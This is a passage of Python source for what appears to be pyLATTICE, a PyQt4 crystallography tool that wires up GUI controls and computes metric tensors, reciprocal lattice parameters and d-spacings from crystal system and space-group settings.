QtCore.QObject.connect(self.checkBox_samemax, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.sameMax)
QtCore.QObject.connect(self.comboBox_hmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_kmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_lmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_hmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_kmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_lmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.checkBox_showforbidden, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.PlotDiffraction)
### Sliders/spin boxes: lattice parameters
QtCore.QObject.connect(self.hSlider_a, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.slider_to_spindouble)
QtCore.QObject.connect(self.hSlider_b, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.slider_to_spindouble)
QtCore.QObject.connect(self.hSlider_c, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.slider_to_spindouble)
QtCore.QObject.connect(self.hSlider_a, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
QtCore.QObject.connect(self.hSlider_b, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
QtCore.QObject.connect(self.hSlider_c, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
QtCore.QObject.connect(self.doubleSpinBox_a, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.spindouble_to_slider)
QtCore.QObject.connect(self.doubleSpinBox_b, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.spindouble_to_slider)
QtCore.QObject.connect(self.doubleSpinBox_c, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.spindouble_to_slider)
QtCore.QObject.connect(self.doubleSpinBox_a, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.MetricTensor)
QtCore.QObject.connect(self.doubleSpinBox_b, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.MetricTensor)
QtCore.QObject.connect(self.doubleSpinBox_c, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.MetricTensor)
#QtCore.QObject.connect(self.doubleSpinBox_a, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.D_Spacings)
#QtCore.QObject.connect(self.doubleSpinBox_b, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.D_Spacings)
#QtCore.QObject.connect(self.doubleSpinBox_c, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.D_Spacings)
QtCore.QObject.connect(self.hSlider_alpha, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.MetricTensor)
QtCore.QObject.connect(self.hSlider_beta, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.MetricTensor)
QtCore.QObject.connect(self.hSlider_gamma, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.MetricTensor)
QtCore.QObject.connect(self.hSlider_alpha, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
QtCore.QObject.connect(self.hSlider_beta, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
QtCore.QObject.connect(self.hSlider_gamma, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
#Spinboxes beam energy, cam length, camconst
QtCore.QObject.connect(self.spinBox_beamenergy,QtCore.SIGNAL(_fromUtf8("valueChanged(int)")),self.updateCommon)
QtCore.QObject.connect(self.spinBox_camlength,QtCore.SIGNAL(_fromUtf8("valueChanged(int)")),self.updateCommon)
QtCore.QObject.connect(self.doubleSpinBox_camconst,QtCore.SIGNAL(_fromUtf8("valueChanged(double)")),self.updateCommon)
#Instances to recalculate metric tensor and d-spacings
#only enable these once you get miller maxes sorted out so they don't change
QtCore.QObject.connect(self.checkBox_zoneaxis, QtCore.SIGNAL(_fromUtf8("toggled(bool)")),self.DiffWidget, QtCore.SLOT(_fromUtf8("setEnabled(bool)")))
QtCore.QObject.connect(self.comboBox_u, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.ReplotDiffraction)
QtCore.QObject.connect(self.comboBox_v, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.ReplotDiffraction)
QtCore.QObject.connect(self.comboBox_w, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.ReplotDiffraction)
QtCore.QObject.connect(self.comboBox_hmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.D_Spacings)
QtCore.QObject.connect(self.comboBox_hmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.D_Spacings)
#QtCore.QObject.connect(self.checkBox_labels, QtCore.SIGNAL(_fromUtf8("toggled(bool)")),self.UpdatePlot)
#QtCore.QObject.connect(self.comboBox_hmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.TempMax)
#QtCore.QObject.connect(self.comboBox_kmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.TempMax)
#QtCore.QObject.connect(self.comboBox_lmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.TempMax)
#QtCore.QObject.connect(self.comboBox_hmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.Recalculate)
#QtCore.QObject.connect(self.comboBox_kmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.Recalculate)
#QtCore.QObject.connect(self.comboBox_lmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.Recalculate)
#QtCore.QObject.connect(self.comboBox_w, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.ReplotDiffraction)
#Calculator Tab
QtCore.QObject.connect(self.checkBox_normals, QtCore.SIGNAL(_fromUtf8("toggled(bool)")),self.CalcLabels)
QtCore.QObject.connect(self.command_angle, QtCore.SIGNAL(_fromUtf8("clicked()")),self.Calculator)
def _initIPython(self,common):
"""Initialize IPython console from which the user can interact with data/files"""
banner = """Welcome to the pyLATTICE IPython Qt4 Console.
You are here to interact with data and parameters - Python command line knowledge required.
Use the 'whos' command for a list of available variables. Sometimes this does not work the first time.
Imported packages include: pylab (including numpy modules) as 'pl'; pandas as 'pd'
\n"""
self.ipywidget = IPythonConsole(common,banner=banner)
def IPY(self):
self.ipywidget.SHOW()
def updateIPY(self,common):
self.ipyvars = common.__dict__
self.ipywidget.pushVariables(self.ipyvars)
def slider_to_spindouble(self,slider):
"""Sliders only send/receive int data. Converts int to double by dividing by 100."""
if self.hSlider_a.isSliderDown():
self.a = self.hSlider_a.value() / 100.0 #float division; slider carries int(value*100)
self.doubleSpinBox_a.setValue(self.a)
elif self.hSlider_b.isSliderDown():
self.b = self.hSlider_b.value() / 100.0
self.doubleSpinBox_b.setValue(self.b)
elif self.hSlider_c.isSliderDown():
self.c = self.hSlider_c.value() / 100.0
self.doubleSpinBox_c.setValue(self.c)
def spindouble_to_slider(self,spinbox):
"""Converts spindouble entry into int for slider (multiply by 100)"""
#There may be some redundancy in the connections setting values.
#hopefully this does not slow the program down.
#without these, some aspect often lags and gives the wrong value
if self.comboBox_crystaltype.currentText() == 'Cubic':
self.a = self.doubleSpinBox_a.value()
self.hSlider_a.setValue(self.a * 100)
self.hSlider_b.setValue(self.a * 100);self.doubleSpinBox_b.setValue(self.a)
self.hSlider_c.setValue(self.a * 100);self.doubleSpinBox_c.setValue(self.a)
elif self.comboBox_crystaltype.currentText() == 'Tetragonal':
self.a = self.doubleSpinBox_a.value()
self.hSlider_a.setValue(self.a * 100)
self.hSlider_b.setValue(self.a * 100); self.doubleSpinBox_b.setValue(self.a)
elif self.comboBox_crystaltype.currentText() == 'Trigonal':
self.a = self.doubleSpinBox_a.value()
self.hSlider_a.setValue(self.a * 100)
self.hSlider_b.setValue(self.a * 100); self.doubleSpinBox_b.setValue(self.a)
elif self.comboBox_crystaltype.currentText() == 'Hexagonal':
self.a = self.doubleSpinBox_a.value()
self.hSlider_a.setValue(self.a * 100)
self.hSlider_b.setValue(self.a * 100); self.doubleSpinBox_b.setValue(self.a)
else:
self.a = self.doubleSpinBox_a.value()
self.hSlider_a.setValue(self.a * 100)
self.b = self.doubleSpinBox_b.value()
self.hSlider_b.setValue(self.b * 100)
self.c = self.doubleSpinBox_c.value()
self.hSlider_c.setValue(self.c * 100)
def setMillerMax_h(self):
"""Sets the items available for the max miller indices to include everything greater than the selected min index"""
self.miller_max_h = [str(x) for x in range(int(self.comboBox_hmin.currentText()) + 1,7)]
self.comboBox_hmax.clear()
self.comboBox_hmax.addItems(self.miller_max_h)
def setMillerMax_k(self):
"""Sets the items available for the max miller indices to include everything greater than the selected min index"""
self.miller_max_k = [str(x) for x in range(int(self.comboBox_kmin.currentText()) + 1,7)]
self.comboBox_kmax.clear()
self.comboBox_kmax.addItems(self.miller_max_k)
def setMillerMax_l(self):
"""Sets the items available for the max miller indices to include everything greater than the selected min index"""
self.miller_max_l = [str(x) for x in range(int(self.comboBox_lmin.currentText()) + 1,7)]
self.comboBox_lmax.clear()
self.comboBox_lmax.addItems(self.miller_max_l)
def sameMin(self):
if not self.checkBox_samemin.isChecked():
#change to value_changed, not index changed. lengths may be different if checkboxes aren't clicked
QtCore.QObject.disconnect(self.comboBox_hmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.disconnect(self.comboBox_kmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.disconnect(self.comboBox_lmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
elif self.checkBox_samemin.isChecked():
QtCore.QObject.connect(self.comboBox_hmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_kmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_lmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
def sameMax(self):
if not self.checkBox_samemax.isChecked():
QtCore.QObject.disconnect(self.comboBox_hmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.disconnect(self.comboBox_kmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.disconnect(self.comboBox_lmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
elif self.checkBox_samemax.isChecked():
QtCore.QObject.connect(self.comboBox_hmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_kmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_lmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
def setMineral(self):
i = self.comboBox_mineraldb.currentIndex()
if i == 0:
pass
else:
#disconnect d-space calculations till the end
QtCore.QObject.disconnect(self.comboBox_crystaltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setCellType)
QtCore.QObject.disconnect(self.comboBox_celltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setConditions)
QtCore.QObject.disconnect(self.spinBox_spacegroup, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.SpaceGroupLookup)
m = self.mineraldb.loc[i]
ind = ['Cubic','Tetragonal','Orthorhombic','Trigonal','Hexagonal','Monoclinic','Triclinic'].index(m.Crystal)
self.comboBox_crystaltype.setCurrentIndex(ind)
self.setCellType()
ind = self.celltypes.index(m.UnitCell)
self.comboBox_celltype.setCurrentIndex(ind)
self.setConditions()
ind = self.sgnumbers.index(m.SpaceGroup)
self.comboBox_spacegroup.setCurrentIndex(ind)
#now a, b, c parameters
#print(self.sgnumbers)
self.doubleSpinBox_a.setValue(m.a)
self.a = m.a
if not np.isnan(m.b):
self.doubleSpinBox_b.setValue(m.b)
self.b = m.b
if not np.isnan(m.c):
self.doubleSpinBox_c.setValue(m.c)
self.c = m.c
try:
self.manualConds = m.SpecialConditions.split(';')
except AttributeError: #ignore floats or nans
self.manualConds = ''
self.MetricTensor()
#reconnect and calculate
QtCore.QObject.connect(self.comboBox_crystaltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setCellType)
QtCore.QObject.connect(self.comboBox_celltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setConditions)
QtCore.QObject.connect(self.spinBox_spacegroup, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.SpaceGroupLookup)
self.D_Spacings()
def setCellType(self):
"""Sets the unit cell possibilities based upon the crystal type selected"""
self.comboBox_celltype.clear()
self.comboBox_spacegroup.clear()
self.celltypes = []
if self.comboBox_crystaltype.currentText() == 'Cubic':
self.celltypes = ['Primitive','Face Centered','Body Centered']
self.length_label = u' a = b = c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(True); self.hSlider_c.setDisabled(True)
self.doubleSpinBox_b.setDisabled(True); self.doubleSpinBox_c.setDisabled(True)
self.angles_label = u' \u03B1 = \u03B2 = \u03B3 = 90°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 90
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Tetragonal':
self.celltypes = ['Primitive','Body Centered']
self.length_label = u' a = b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(True); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(True); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u' \u03B1 = \u03B2 = \u03B3 = 90°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 90
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Orthorhombic':
self.celltypes = ['Primitive','Face Centered','Body Centered','(001) Base Centered','(100) Base Centered']
self.length_label = u' a ≠ b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(False); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(False); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u' \u03B1 = \u03B2 = \u03B3 = 90°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 90
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Trigonal':
self.celltypes = ['Primitive','Rhombohedral','Rhombohedral, Hexagonal Axes','Hexagonal']
self.length_label = u' a = b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(True); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(True); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u' \u03B1 = \u03B2 = 90°, \u03B3 = 120°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 120
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Hexagonal':
self.celltypes = ['Primitive']
self.length_label = u' a = b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(True); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(True); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u' \u03B1 = \u03B2 = 90°, \u03B3 = 120°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 120
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Monoclinic':
self.celltypes = ['Primitive','(001) Base Centered']
self.length_label = u' a ≠ b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(False); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(False); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u' \u03B1 = \u03B3 = 90°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 90
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Triclinic':
self.celltypes = ['Primitive']
self.length_label = u' a ≠ b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(False); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(False); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u''
self.label_angle_equality.setText(self.angles_label)
#Enable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(False); self.hSlider_beta.setDisabled(False); self.hSlider_gamma.setDisabled(False)
self.spinBox_alpha.setDisabled(False); self.spinBox_beta.setDisabled(False); self.spinBox_gamma.setDisabled(False)
self.comboBox_celltype.addItems(self.celltypes)
#self.Recalculate()
def setConditions(self):
"""Sets conditions based upon which unit cell type is chosen.
Store equations in strings and then evaluate and solve with eval()"""
geom = self.comboBox_crystaltype.currentText()
unit = self.comboBox_celltype.currentText()
if unit in ['Rhombohedral','Rhombohedral, Hexagonal Axes']:
self.checkBox_obverse.setDisabled(False)
else:
self.checkBox_obverse.setDisabled(True)
try: #there is a loop I can't find where this tries to calculate conditions before the unit cell type is set, resulting in an IndexError.
#this simply suppresses the error, as another pass is always fine.
if unit in ['Rhombohedral, Hexagonal Axes','Hexagonal']:
rhomhex=True
self.conditions = np.unique(self.sghex[self.sghex['Unit Cell'] == unit]['Conditions'])[0]
else:
rhomhex=False
self.conditions = np.unique(self.sg[self.sg['Unit Cell'] == unit]['Conditions'])[0] #grab individual condition b/c of repetition
self.setSpaceGroups(geom,unit,rhomhex)
#QtCore.QObject.disconnect(self.comboBox_spacegroup, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.D_Spacings)
self.comboBox_spacegroup.clear()
self.comboBox_spacegroup.addItems(self.sgnumlist)
#QtCore.QObject.connect(self.comboBox_spacegroup, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.D_Spacings)
self.Recalculate()
except IndexError:
pass
def setSpaceGroups(self,geom,unit,rhomhex=False):
"""Sets the space group options based upon crystal geometry and unit cell type"""
if rhomhex:
sg = self.sghex
elif not rhomhex:
sg = self.sg
self.sgnumbers = list(sg[(sg['Geometry'] == geom) & (sg['Unit Cell'] == unit)].index)
self.sglist = list(sg.loc[self.sgnumbers,'Patterson'])
self.sgnumlist = [str(x) + ': ' + y for x,y in zip(self.sgnumbers,self.sglist)]
def SpaceGroupConditions(self,number):
"""Looks up the space-group-specific allowed diffraction spots.
number is the specific space group number to look up."""
if not self.checkBox_spacegroup.isChecked():
sg_conditions = 'True'
elif self.checkBox_spacegroup.isChecked():
#make sure number is an integer
#something is wrong with some FCC crystals
number = int(number)
unit = self.comboBox_celltype.currentText()
if unit in ['Rhombohedral, Hexagonal Axes','Hexagonal']:
sg = self.sghex
else:
sg = self.sg
sg_conditions = sg.loc[number,'SG Conditions']
return sg_conditions
def SpaceGroupLookup(self):
"""Takes input from slider/spinbox and outputs sapcegroup info into text line"""
index = self.spinBox_spacegroup.value()
c = self.sg.loc[index,'Geometry']
#u = self.sg.loc[index,'Unit Cell']
sg = self.sg.loc[index,'Patterson']
text = ': '.join([c,sg])
self.label_spacegrouplookup.setText(text)
def MetricTensor(self):
"""Calculate and show G, the metric tensor, and G*, the inverse metric tensor.
Also call function that outputs parameters into tables."""
self.G = np.zeros([3,3])
#self.G_inv
#remember, indices start at 0
#metric tensor is axially symmetric
self.a = self.doubleSpinBox_a.value()
self.b = self.doubleSpinBox_b.value()
self.c = self.doubleSpinBox_c.value()
self.G[0,0] = self.a**2
self.G[0,1] = round(self.a * self.b * np.cos(np.radians(self.spinBox_gamma.value())),6)
self.G[1,0] = self.G[0,1]
self.G[1,1] = self.b**2
self.G[0,2] = round(self.a * self.c * np.cos(np.radians(self.spinBox_beta.value())),6)
self.G[2,0] = self.G[0,2]
self.G[2,2] = self.c**2
self.G[1,2] = round(self.c * self.b * np.cos(np.radians(self.spinBox_alpha.value())),6)
self.G[2,1] = self.G[1,2]
# calc G inverse, G*
self.G_inv = np.linalg.inv(self.G)
self.Gtable.setData(self.G)
#self.Gtable.resizeColumnsToContents()
self.G_inv_table.setData(self.G_inv)
#self.G_inv_table.resizeColumnsToContents()
for i in range(0,3):
self.Gtable.setColumnWidth(i,self.Gtable_size[0]/3.35)
self.Gtable.setRowHeight(i,self.Gtable_size[1]/3.5)
self.G_inv_table.setColumnWidth(i,self.Gtable_size[0]/3.35)
self.G_inv_table.setRowHeight(i,self.Gtable_size[1]/3.5)
self.Parameters()
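#A minimal standalone sketch of the computation above (hypothetical helper,
#not part of pyLATTICE); angles in degrees:
#
#   import numpy as np
#   def metric_tensor(a, b, c, alpha, beta, gamma):
#       ca, cb, cg = np.cos(np.radians([alpha, beta, gamma]))
#       G = np.array([[a*a,    a*b*cg, a*c*cb],
#                     [a*b*cg, b*b,    b*c*ca],
#                     [a*c*cb, b*c*ca, c*c]])
#       return G, np.linalg.inv(G)  #direct metric tensor G and reciprocal G*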
def Parameters(self):
"""Grabs current parameters and outputs them in tables.
Calculates reciprocal lattice parameters as well.
Must make it deal with complex numbers, but really only necessary for Triclinic..."""
self.parameters_direct = np.transpose(np.array([[self.doubleSpinBox_a.value(),self.doubleSpinBox_b.value(),self.doubleSpinBox_c.value(),self.spinBox_alpha.value(),self.spinBox_beta.value(),self.spinBox_gamma.value()]]))
self.astar = np.sqrt(self.G_inv[0,0]); self.bstar = np.sqrt(self.G_inv[1,1]); self.cstar = np.sqrt(self.G_inv[2,2])
self.gammastar = np.arccos(self.G_inv[0,1] / (self.astar * self.bstar))*180 / np.pi
self.betastar = np.arccos(self.G_inv[0,2] / (self.astar * self.cstar))*180 / np.pi
self.alphastar = np.arccos(self.G_inv[1,2] / (self.cstar * self.bstar))*180 / np.pi
self.parameters_reciprocal = np.transpose(np.array([[self.astar,self.bstar,self.cstar,self.alphastar,self.betastar,self.gammastar]]))
self.Gparam_table.setData(self.parameters_direct)
self.Gparam_inv_table.setData(self.parameters_reciprocal)
self.Gparam_table.setHorizontalHeaderLabels(['Parameters'])
self.Gparam_inv_table.setHorizontalHeaderLabels(['Parameters'])
self.Gparam_table.setVerticalHeaderLabels([u'a',u'b',u'c',u'\u03B1',u'\u03B2',u'\u03B3'])
self.Gparam_inv_table.setVerticalHeaderLabels([u'a*',u'b*',u'c*',u'\u03B1*',u'\u03B2*',u'\u03B3*'])
for i in range(0,6):
self.Gparam_table.setColumnWidth(i,self.param_table_size[0])
self.Gparam_table.setRowHeight(i,self.param_table_size[0]/6.7)
self.Gparam_inv_table.setColumnWidth(i,self.param_table_size[0])
self.Gparam_inv_table.setRowHeight(i,self.param_table_size[0]/6.7)
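#Sketch of the reciprocal-parameter relations used above, with G_inv = G*:
#   a* = sqrt(G*[0,0]),  cos(gamma*) = G*[0,1] / (a* b*)
#(and cyclic permutations for b*, c*, alpha*, beta*).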
def D_Spacings(self):
"""Calculates D-spacings using the metric tensor and places them in a table (sorted?)"""
#grab spacegroup conditions
#multiple different spacegroup conditions. e.g. eval('h==1 or k==1') returns True if one is satisfied
#add all conditions together into one string
#full_conditions = self.conditions + ' and ' + sg_conditions
if self.checkBox_zoneaxis.isChecked():
try:
self.u = int(self.comboBox_u.currentText())
except ValueError:
self.u = 0
try:
self.v = int(self.comboBox_v.currentText())
except ValueError:
self.v = 0
try:
self.w = int(self.comboBox_w.currentText())
except ValueError:
self.w = 0
#set "q" for rhombohedral obserse/reverse
if self.checkBox_obverse.isChecked():
q = 1
elif not self.checkBox_obverse.isChecked():
q = -1
else:
q = 0
#make pandas dataframe with multiindex h,k,l
#reinitialize dataframe
self.DSpaces = pd.DataFrame(columns = ['d-space','h','k','l'])
self.Forbidden = pd.DataFrame(columns = ['d-space','h','k','l'])
#maybe implement masking instead of loops
hmin = int(self.comboBox_hmin.currentText())
hmax = int(self.comboBox_hmax.currentText())
kmin = int(self.comboBox_kmin.currentText())
kmax = int(self.comboBox_kmax.currentText())
lmin = int(self.comboBox_lmin.currentText())
lmax = int(self.comboBox_lmax.currentText())
gen_conditions = str(self.conditions)
#needs to deal with possibility of conditional special statements, will update dspace.pyx
#first calculate all general conditions
self.DSpaces = DSpace(self.G_inv,self.u,self.v,self.w,hmin,hmax,kmin,kmax,lmin,lmax,gen_conditions,q)
#now deal with special spacegroup conditions by removing invalid spots
sg_conditions = self.SpaceGroupConditions(self.sgnumbers[self.comboBox_spacegroup.currentIndex()])
if self.manualConds != []:
if sg_conditions == 'True':
sg_conditions = ''
for c in self.manualConds:
sg_conditions += ';%s' % c
sg_conditions = sg_conditions.lstrip(';')
self.DSpaces = self.RemoveForbidden(self.DSpaces,sg_conditions)
#sort in descending Dspace order, then by h values, then k, then l...
self.DSpaces.sort(columns=['d-space','h','k','l'],ascending=False,inplace=True)
#reset indices for convenience later
self.DSpaces.index = [x for x in range(len(self.DSpaces))]
self.common.DSpaces = self.DSpaces #update DSpaces
self.dspace_table.setData(self.DSpaces)
self.dspace_table.setColumnWidth(0,80) #make d-space column a bit wider
for i in range(1,4):
self.dspace_table.setColumnWidth(i,45)
elif not self.checkBox_zoneaxis.isChecked():
pass
try:
self.updateCommon()
except AttributeError: #first go round ipython console hasn't been initialized yet
pass
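#The underlying relation (sketch): for plane (h k l), the interplanar spacing
#follows from the reciprocal metric tensor, d = 1/sqrt(h . G* . h^T). A quick
#hypothetical check for a cubic cell with a = 4 Angstroms and (2 0 0):
#
#   import numpy as np
#   G_star = np.linalg.inv(np.diag([16., 16., 16.]))  #G = a**2 * identity
#   hkl = np.array([2, 0, 0])
#   d = 1.0 / np.sqrt(hkl.dot(G_star).dot(hkl))       #-> 2.0 Angstroms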
def RemoveForbidden(self,d,sgconditions):
#h = d['h']; k = d['k']; l = d['l']
f = pd.DataFrame(columns = ['d-space','h','k','l'])
try:
if eval(sgconditions):
return(d)
except (KeyError,SyntaxError): #if sgconditions not 'True'
